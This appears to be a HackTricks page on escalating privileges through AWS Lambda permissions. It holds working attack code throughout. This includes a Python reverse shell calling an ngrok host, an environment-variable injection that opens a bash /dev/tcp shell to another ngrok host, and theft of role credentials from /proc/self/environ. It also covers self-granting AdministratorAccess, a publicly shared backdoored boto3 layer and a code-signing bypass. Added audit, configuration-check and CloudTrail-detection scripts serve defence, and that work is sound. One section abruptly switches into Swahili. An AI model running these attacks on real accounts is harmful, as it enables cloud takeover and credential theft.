AWS - Lambda Privesc

tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

lambda

More information about Lambda in:

AWS - Lambda Enum

iam:PassRole, lambda:CreateFunction, (lambda:InvokeFunction | lambda:InvokeFunctionUrl)

Users with the iam:PassRole, lambda:CreateFunction, and lambda:InvokeFunction permissions can escalate their privileges. They can create a new Lambda function and attach it to an existing IAM role, granting the function the permissions associated with that role. The user can then write and upload code to this Lambda function (for example a reverse shell). Once the function is set up, the user can trigger its execution and the intended actions by invoking the Lambda function through the AWS API. This approach lets the user execute tasks indirectly through the Lambda function, operating with the level of access granted to the associated IAM role.

An attacker could abuse this to get a reverse shell and steal the role's credentials:

rev.py

```python
import socket, subprocess, os, time

def lambda_handler(event, context):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('4.tcp.ngrok.io', 14305))
    os.dup2(s.fileno(), 0)
    os.dup2(s.fileno(), 1)
    os.dup2(s.fileno(), 2)
    p = subprocess.call(['/bin/sh', '-i'])
    time.sleep(900)
    return 0
```

```bash
# Zip the rev shell
zip "rev.zip" "rev.py"

# Create the function
aws lambda create-function --function-name my_function \
  --runtime python3.9 --role <arn_of_lambda_role> \
  --handler rev.lambda_handler --zip-file fileb://rev.zip

# Invoke the function
aws lambda invoke --function-name my_function output.txt
## If you only have the lambda:InvokeFunctionUrl permission you need to expose the lambda via a function URL and execute it through that URL

# List roles
aws iam list-attached-user-policies --user-name <user-name>
```

You can also abuse the permissions of the Lambda role from inside the Lambda function itself.
If the Lambda role has enough permissions, you could use it to grant yourself admin rights:

```python
import boto3

def lambda_handler(event, context):
    client = boto3.client('iam')
    response = client.attach_user_policy(
        UserName='my_username',
        PolicyArn='arn:aws:iam::aws:policy/AdministratorAccess'
    )
    return response
```

It is also possible to leak the Lambda role credentials without needing an external connection. This is useful for network-isolated Lambdas used for internal tasks. If there are unknown security groups filtering your reverse shells, this piece of code lets you leak the credentials directly as the Lambda output (the role credentials are exposed to the handler as environment variables):

```python
def handler(event, context):
    # /proc/self/environ holds the process environment, including the AWS_* credential variables
    sessiontoken = open('/proc/self/environ', "r").read()
    return {
        'statusCode': 200,
        'session': str(sessiontoken)
    }
```

```bash
aws lambda invoke --function-name <lambda_name> output.txt
cat output.txt
```

Potential Impact: Direct privesc to any Lambda service role specified.

caution

Note that even though lambda:InvokeAsync may look tempting, on its own it does not allow running aws lambda invoke-async; you also need lambda:InvokeFunction.

iam:PassRole, lambda:CreateFunction, lambda:AddPermission

As in the previous scenario, you can grant yourself the lambda:InvokeFunction permission if you have the lambda:AddPermission permission:

```bash
# Check the previous exploit and use the following line to grant yourself the invoke permissions
aws --profile "$NON_PRIV_PROFILE_USER" lambda add-permission --function-name my_function \
  --action lambda:InvokeFunction --statement-id statement_privesc --principal "$NON_PRIV_PROFILE_USER_ARN"
```

Potential Impact: Direct privesc to any Lambda service role specified.

iam:PassRole, lambda:CreateFunction, lambda:CreateEventSourceMapping

Users with the iam:PassRole, lambda:CreateFunction, and lambda:CreateEventSourceMapping permissions (and possibly dynamodb:PutItem and dynamodb:CreateTable) can indirectly escalate privileges even without lambda:InvokeFunction.
They can create a Lambda function with malicious code and assign it an existing IAM role.

Instead of invoking the Lambda directly, the user sets up or uses an existing DynamoDB table and links it to the Lambda through an event source mapping. This setup ensures the Lambda function is triggered automatically as soon as a new item is inserted into the table, whether by user action or by another process, thereby indirectly invoking the Lambda function and executing code with the permissions of the passed IAM role.

```bash
aws lambda create-function --function-name my_function \
  --runtime python3.8 --role <arn_of_lambda_role> \
  --handler lambda_function.lambda_handler \
  --zip-file fileb://rev.zip
```

If DynamoDB is already active in the AWS environment, the user only needs to establish the event source mapping for the Lambda function. However, if DynamoDB is not in use, the user must create a new table with streaming enabled:

```bash
aws dynamodb create-table --table-name my_table \
  --attribute-definitions AttributeName=Test,AttributeType=S \
  --key-schema AttributeName=Test,KeyType=HASH \
  --provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5 \
  --stream-specification StreamEnabled=true,StreamViewType=NEW_AND_OLD_IMAGES
```

It is now possible to connect the Lambda function to the DynamoDB table by creating an event source mapping:

```bash
aws lambda create-event-source-mapping --function-name my_function \
  --event-source-arn <arn_of_dynamodb_table_stream> \
  --enabled --starting-position LATEST
```

Since the Lambda function is connected to the DynamoDB stream, the attacker can trigger the Lambda indirectly by activating the stream. This can be done by inserting an item into the DynamoDB table:

```bash
aws dynamodb put-item --table-name my_table \
  --item Test={S="Random string"}
```

Potential Impact: Direct privesc to the Lambda service role specified.
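To audit an account for the permission combinations discussed in the sections above (and the single-permission cases further down this page), the following added example checks a principal's effective Allow actions against each combination. This is illustrative code written for this page, not HackTricks' own tooling: ESCALATION_PATHS mirrors the combinations listed in the text, the sample action list is constructed, and only Allow statements are modelled, so resolve Deny statements, SCPs and resource policies first (for example with the IAM policy simulator) before trusting a result.

```python
"""Audit a principal's allowed IAM actions against the Lambda privilege
escalation combinations listed on this page (added example)."""

from fnmatch import fnmatchcase

# (description, actions that must ALL be allowed for the path to exist)
ESCALATION_PATHS = [
    ("create function + invoke",
     ("iam:PassRole", "lambda:CreateFunction", "lambda:InvokeFunction")),
    ("create function + invoke via function URL",
     ("iam:PassRole", "lambda:CreateFunction", "lambda:InvokeFunctionUrl")),
    ("create function + self-grant invoke via AddPermission",
     ("iam:PassRole", "lambda:CreateFunction", "lambda:AddPermission")),
    ("create function + DynamoDB stream trigger",
     ("iam:PassRole", "lambda:CreateFunction", "lambda:CreateEventSourceMapping")),
    ("rewrite existing function code", ("lambda:UpdateFunctionCode",)),
    ("rewrite function configuration (env vars / layers)",
     ("lambda:UpdateFunctionConfiguration",)),
    ("grant yourself actions on an existing function", ("lambda:AddPermission",)),
    ("code signing bypass: delete CSC",
     ("lambda:DeleteFunctionCodeSigningConfig", "lambda:UpdateFunctionCode")),
    ("code signing bypass: swap in a WARN CSC",
     ("lambda:CreateCodeSigningConfig", "lambda:PutFunctionCodeSigningConfig",
      "lambda:UpdateFunctionCode")),
]


def action_allowed(action, allowed_patterns):
    """IAM action names are case-insensitive and Allow statements may use
    '*' / '?' wildcards ('lambda:*', 'lambda:Update*', '*')."""
    action = action.lower()
    return any(fnmatchcase(action, pattern.lower()) for pattern in allowed_patterns)


def find_escalation_paths(allowed_patterns):
    """Return the description of every path whose required actions are all
    covered by the given Allow action patterns, in page order."""
    return [desc for desc, needed in ESCALATION_PATHS
            if all(action_allowed(a, allowed_patterns) for a in needed)]


if __name__ == "__main__":
    # Constructed sample: a deploy user whose policy grants lambda:Create*.
    sample = ["iam:PassRole", "lambda:Create*", "lambda:InvokeFunction"]
    for path in find_escalation_paths(sample):
        print("possible privesc:", path)
```

The wildcard handling matters in practice: a policy that grants `lambda:Create*` to a deploy user silently covers both lambda:CreateFunction and lambda:CreateEventSourceMapping, so the sample above reports the DynamoDB-trigger path even though the policy never names it.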

lambda:AddPermission

Mshambuliaji mwenye ruhusa hii anaweza kujipa (au kuwapa wengine) ruhusa yoyote (hii inazalisha resource based policies za kuipa ufikiaji rasilimali):

bash
# Give yourself all permissions (you could specify granular such as lambda:InvokeFunction or lambda:UpdateFunctionCode)
aws lambda add-permission --function-name <func_name> --statement-id asdasd --action '*' --principal arn:<your user arn>

# Invoke the function
aws lambda invoke --function-name <func_name> /tmp/outout

Athari Inayoweza Kutokea: Privesc ya moja kwa moja kwa cheo cha huduma cha lambda kwa kumpa ruhusa ya kubadilisha code na kuendesha.

lambda:AddLayerVersionPermission

An attacker with this permission can grant themselves (or others) the lambda:GetLayerVersion permission. They could then access the layer and search for vulnerabilities or sensitive information.

```bash
# Give everyone the permission lambda:GetLayerVersion
aws lambda add-layer-version-permission --layer-name ExternalBackdoor --statement-id xaccount --version-number 1 --principal '*' --action lambda:GetLayerVersion
```

Potential Impact: Potential access to sensitive information.

lambda:UpdateFunctionCode

Users holding the lambda:UpdateFunctionCode permission can modify the code of an existing Lambda function that is linked to an IAM role.
An attacker can modify the Lambda code to exfiltrate the IAM credentials.

Even if the attacker has no direct ability to invoke the Lambda function, if the function already exists and is operational it is likely to be triggered through existing workflows or events, indirectly enabling execution of the modified code.

```bash
# The zip should contain the lambda code (trick: download the current one and add your code there)
aws lambda update-function-code --function-name target_function \
  --zip-file fileb:///my/lambda/code/zipped.zip

# If you have invoke permissions:
aws lambda invoke --function-name my_function output.txt

# If not, check whether it's exposed via any function URL or an API Gateway you can access
```

Potential Impact: Direct privesc to the Lambda service role used.

lambda:UpdateFunctionConfiguration

RCE via env variables

With these permissions it's possible to add environment variables that will make the Lambda execute arbitrary code. For example, in Python it's possible to abuse the PYTHONWARNINGS and BROWSER environment variables to make the Python process execute arbitrary commands:

```bash
aws --profile none-priv lambda update-function-configuration --function-name <func-name> --environment "Variables={PYTHONWARNINGS=all:0:antigravity.x:0:0,BROWSER=\"/bin/bash -c 'bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/18755 0>&1' & #%s\"}"
```

For other scripting languages there are other env variables you can use. For more information check the scripting-language subsections in:

macOS Process Abuse - HackTricks

RCE via Lambda Layers

Lambda Layers allow you to include code in your Lambda function while storing it separately, so the function code can stay small and several functions can share code.

Inside a Lambda you can check the paths from which Python code is loaded with a function like the following:

```python
import json
import sys

def lambda_handler(event, context):
    print(json.dumps(sys.path, indent=2))
```

These are the locations:

  1. /var/task
  2. /opt/python/lib/python3.7/site-packages
  3. /opt/python
  4. /var/runtime
  5. /var/lang/lib/python37.zip
  6. /var/lang/lib/python3.7
  7. /var/lang/lib/python3.7/lib-dynload
  8. /var/lang/lib/python3.7/site-packages
  9. /opt/python/lib/python3.7/site-packages
  10. /opt/python

For example, the boto3 library is loaded from /var/runtime/boto3 (position 4).

Exploitation

It's possible to abuse the lambda:UpdateFunctionConfiguration permission to add a new layer to a Lambda function. To execute arbitrary code, this layer needs to contain some library that the Lambda is going to import. If you can read the code of the Lambda you can find this easily; also note that the Lambda might already be using a layer, in which case you could download that layer and add your code inside it.

For example, supposing that the Lambda uses the boto3 library, this will create a local layer with the latest version of the library:

```bash
pip3 install -t ./lambda_layer boto3
```

You can open ./lambda_layer/boto3/__init__.py and add the backdoor in the global code (a function to exfiltrate credentials or get a reverse shell, for example).

Then, zip that ./lambda_layer directory and upload the new Lambda layer in your own account (or in the victim's account, but you might not have permissions for this).
Note that you need to create a python folder and put the libraries there in order to override /opt/python/boto3. Also, the layer needs to be compatible with the Python version used by the Lambda, and if you upload it to your account it needs to be in the same region:

```bash
aws lambda publish-layer-version --layer-name "boto3" --zip-file file://backdoor.zip --compatible-architectures "x86_64" "arm64" --compatible-runtimes "python3.9" "python3.8" "python3.7" "python3.6"
```

Now, make the uploaded Lambda layer accessible to any account:

```bash
aws lambda add-layer-version-permission --layer-name boto3 \
  --version-number 1 --statement-id public \
  --action lambda:GetLayerVersion --principal *
```

And attach the Lambda layer to the victim Lambda function:

```bash
aws lambda update-function-configuration \
  --function-name <func-name> \
  --layers arn:aws:lambda:<region>:<attacker-account-id>:layer:boto3:1 \
  --timeout 300 #5min for rev shells
```

The next step would be to either invoke the function ourselves if we can, or wait until it gets invoked by normal means, which is the safer way.

A stealthier way to exploit this can be found in:

AWS - Lambda Layers Persistence

Potential Impact: Direct privesc to the Lambda service role used.
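Both lambda:UpdateFunctionConfiguration abuses above leave traces in the function's configuration: the interpreter-hijacking variables and a layer ARN from an account that is not the function's own. The following added example (written for this page, not HackTricks' own code) audits one configuration for those traces. SAMPLE_CONFIG is a constructed dict shaped like the output of `aws lambda get-function-configuration`; the keys it reads (FunctionArn, Environment.Variables, Layers[].Arn, Timeout) are the real ones, and the long-timeout check is a heuristic taken from the `--timeout 300` in the example above.

```python
"""Posture check for the UpdateFunctionConfiguration abuses on this page:
hijacking env variables and layers from another account (added example)."""

# Variables this page shows being abused for Python; extend with the ones for
# other runtimes from the linked "macOS Process Abuse" page.
HIJACK_ENV_KEYS = {"PYTHONWARNINGS", "BROWSER"}

# Timeout the page's example sets to keep a reverse shell alive (seconds).
LONG_TIMEOUT_SECONDS = 300


def arn_account(arn):
    """The account id is the 5th ':'-separated field of an AWS ARN."""
    parts = arn.split(":")
    return parts[4] if len(parts) > 4 else None


def audit_function_config(config, trusted_accounts=()):
    """Return human-readable findings for one function configuration.
    Layers from the function's own account or `trusted_accounts` are accepted."""
    findings = []
    own_account = arn_account(config["FunctionArn"])
    trusted = set(trusted_accounts) | {own_account}

    variables = config.get("Environment", {}).get("Variables", {})
    for key in sorted(variables):
        if key.upper() in HIJACK_ENV_KEYS:
            findings.append(f"hijack env var {key}={variables[key]!r}")

    for layer in config.get("Layers", []):
        account = arn_account(layer["Arn"])
        if account not in trusted:
            findings.append(f"layer from untrusted account {account}: {layer['Arn']}")

    # Lambda's default timeout is 3 s; a 5 min timeout on a small function is unusual.
    if config.get("Timeout", 3) >= LONG_TIMEOUT_SECONDS:
        findings.append(f"timeout {config['Timeout']}s (long-lived execution)")
    return findings


SAMPLE_CONFIG = {  # constructed sample, not a real function
    "FunctionName": "billing-export",
    "FunctionArn": "arn:aws:lambda:us-east-1:111111111111:function:billing-export",
    "Runtime": "python3.9",
    "Timeout": 300,
    "Environment": {"Variables": {
        "TABLE": "invoices",
        "PYTHONWARNINGS": "all:0:antigravity.x:0:0",
        "BROWSER": "/bin/bash -c '<command>' & #%s",
    }},
    "Layers": [
        {"Arn": "arn:aws:lambda:us-east-1:111111111111:layer:common-utils:3"},
        {"Arn": "arn:aws:lambda:us-east-1:222222222222:layer:boto3:1"},
    ],
}

if __name__ == "__main__":
    for finding in audit_function_config(SAMPLE_CONFIG):
        print("FINDING:", finding)
```

Run it over every function in the account (one `get-function-configuration` call each) and pass the accounts that legitimately publish shared layers in `trusted_accounts`; a layer named like a standard library (boto3 here) but published elsewhere is exactly the pattern the layer technique above relies on.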

iam:PassRole, lambda:CreateFunction, lambda:CreateFunctionUrlConfig, lambda:InvokeFunctionUrl

Probably with those permissions you will be able to create a function and execute it by calling its URL... but I couldn't find a way to test it, so let me know if you manage to!

Lambda MitM

Some Lambdas will be receiving sensitive information from users as parameters. If you get RCE in one of them, you can exfiltrate the information other users are sending to it; check:

AWS - Lambda Steal Requests


lambda:DeleteFunctionCodeSigningConfig or lambda:PutFunctionCodeSigningConfig + lambda:UpdateFunctionCode — Bypass Lambda Code Signing

If a Lambda function enforces code signing, an attacker who can remove the Code Signing Config (CSC) or downgrade it to Warn can push unsigned code to the function. This bypasses the integrity control without changing the function's IAM role or triggers.

Permissions (one of):

  • Path A: lambda:DeleteFunctionCodeSigningConfig, lambda:UpdateFunctionCode
  • Path B: lambda:CreateCodeSigningConfig, lambda:PutFunctionCodeSigningConfig, lambda:UpdateFunctionCode

Notes:

  • For Path B, you don't need an AWS Signer profile if the CSC policy is set to WARN (unsigned artifacts allowed).

Steps (REGION=us-east-1, TARGET_FN=):

Prepare a minimal payload:

```bash
cat > handler.py <<'PY'
import os, json
def lambda_handler(event, context):
    return {"pwn": True, "env": list(os.environ)[:6]}
PY
zip backdoor.zip handler.py
```

Path A) Remove the CSC, then update the code:

```bash
aws lambda get-function-code-signing-config --function-name $TARGET_FN --region $REGION && HAS_CSC=1 || HAS_CSC=0
if [ "$HAS_CSC" -eq 1 ]; then
  aws lambda delete-function-code-signing-config --function-name $TARGET_FN --region $REGION
fi
aws lambda update-function-code --function-name $TARGET_FN --zip-file fileb://backdoor.zip --region $REGION
# If the handler name changed, also run:
aws lambda update-function-configuration --function-name $TARGET_FN --handler handler.lambda_handler --region $REGION
```

Path B) Downgrade to Warn and update the code (if deletion is not allowed):

```bash
CSC_ARN=$(aws lambda create-code-signing-config \
  --description ht-warn-csc \
  --code-signing-policies UntrustedArtifactOnDeployment=WARN \
  --query CodeSigningConfig.CodeSigningConfigArn --output text --region $REGION)
aws lambda put-function-code-signing-config --function-name $TARGET_FN --code-signing-config-arn $CSC_ARN --region $REGION
aws lambda update-function-code --function-name $TARGET_FN --zip-file fileb://backdoor.zip --region $REGION
# If the handler name changed, also run:
aws lambda update-function-configuration --function-name $TARGET_FN --handler handler.lambda_handler --region $REGION
```

Invoke and verify (if you have invoke permissions):

```bash
aws lambda invoke --function-name $TARGET_FN /tmp/out.json --region $REGION >/dev/null
cat /tmp/out.json
```

Potential Impact: Ability to push and run arbitrary unsigned code on a function that was expected to enforce signed deployments, potentially leading to code execution with the function's role permissions.

Cleanup:

```bash
aws lambda delete-function-code-signing-config --function-name $TARGET_FN --region $REGION || true
```
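Every technique on this page that touches an existing function (lambda:AddPermission, lambda:UpdateFunctionCode, lambda:UpdateFunctionConfiguration, the event source mapping, and the code-signing bypass just described) is a control-plane write that CloudTrail records. The following added example (written for this page, not HackTricks' own code) classifies a CloudTrail JSON-lines excerpt and raises the severity for the patterns shown above: a wildcard `--action '*'` self-grant, a layer attached from a foreign account, and a CSC being deleted or replaced. SAMPLE_LOG is constructed; the eventName strings and the requestParameters keys (functionName, action, layers) are assumed to match what CloudTrail records for these Lambda API calls, so confirm them against your own trail before turning this into a production rule.

```python
"""Flag CloudTrail records for the Lambda write operations this page shows
being abused (added example)."""

import json

WATCHED_EVENTS = {
    "CreateFunction20150331": "function created (check the passed role)",
    "UpdateFunctionCode20150331v2": "function code replaced",
    "UpdateFunctionConfiguration20150331v2": "env vars / layers / handler changed",
    "AddPermission20150331v2": "resource policy statement added",
    "AddLayerVersionPermission20181031": "layer version shared",
    "CreateEventSourceMapping20150331": "new trigger wired to a function",
    "DeleteFunctionCodeSigningConfig": "code signing enforcement removed",
    "PutFunctionCodeSigningConfig": "code signing config replaced",
}
HIGH_SEVERITY_EVENTS = {"DeleteFunctionCodeSigningConfig", "PutFunctionCodeSigningConfig"}


def arn_account(arn):
    """The account id is the 5th ':'-separated field of an AWS ARN."""
    parts = arn.split(":")
    return parts[4] if len(parts) > 4 else None


def classify_record(record):
    """Return a finding dict for one CloudTrail record, or None if the record
    is not one of the watched Lambda write operations."""
    name = record.get("eventName", "")
    if name not in WATCHED_EVENTS:
        return None
    params = record.get("requestParameters") or {}
    severity, detail = "medium", WATCHED_EVENTS[name]

    if name in HIGH_SEVERITY_EVENTS:
        severity = "high"
    elif name == "AddPermission20150331v2" and params.get("action") in ("*", "lambda:*"):
        # The lambda:AddPermission self-grant on this page uses --action '*'
        severity, detail = "high", detail + " with wildcard action"
    elif name == "UpdateFunctionConfiguration20150331v2":
        own = record.get("recipientAccountId")
        foreign = [arn for arn in params.get("layers", []) if arn_account(arn) != own]
        if foreign:
            severity = "high"
            detail = "layer attached from another account: " + ", ".join(foreign)

    return {
        "severity": severity,
        "event": name,
        "function": params.get("functionName"),
        "actor": (record.get("userIdentity") or {}).get("arn"),
        "detail": detail,
    }


def scan_cloudtrail(lines):
    """Classify every non-empty JSON line; findings come back in log order."""
    findings = []
    for line in lines:
        if line.strip():
            finding = classify_record(json.loads(line))
            if finding:
                findings.append(finding)
    return findings


# Constructed sample records, trimmed to the fields used above.
SAMPLE_LOG = """
{"eventName": "Invoke", "userIdentity": {"arn": "arn:aws:iam::111111111111:user/ci"}, "requestParameters": {"functionName": "billing-export"}, "recipientAccountId": "111111111111"}
{"eventName": "UpdateFunctionCode20150331v2", "userIdentity": {"arn": "arn:aws:iam::111111111111:user/dev-alice"}, "requestParameters": {"functionName": "billing-export"}, "recipientAccountId": "111111111111"}
{"eventName": "AddPermission20150331v2", "userIdentity": {"arn": "arn:aws:iam::111111111111:user/dev-alice"}, "requestParameters": {"functionName": "billing-export", "statementId": "asdasd", "action": "*", "principal": "arn:aws:iam::111111111111:user/dev-alice"}, "recipientAccountId": "111111111111"}
{"eventName": "UpdateFunctionConfiguration20150331v2", "userIdentity": {"arn": "arn:aws:iam::111111111111:user/dev-alice"}, "requestParameters": {"functionName": "billing-export", "layers": ["arn:aws:lambda:us-east-1:222222222222:layer:boto3:1"]}, "recipientAccountId": "111111111111"}
{"eventName": "DeleteFunctionCodeSigningConfig", "userIdentity": {"arn": "arn:aws:iam::111111111111:user/dev-alice"}, "requestParameters": {"functionName": "billing-export"}, "recipientAccountId": "111111111111"}
""".strip().splitlines()

if __name__ == "__main__":
    for f in scan_cloudtrail(SAMPLE_LOG):
        print(f"[{f['severity']}] {f['actor']} {f['event']} on {f['function']}: {f['detail']}")
```

The useful signal is the sequence rather than any single event: a code rewrite followed by a CSC deletion, or an AddPermission self-grant followed by an Invoke from the same principal, is what the escalation paths above look like in a trail, so correlate findings by actor and function name rather than alerting on each row in isolation.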
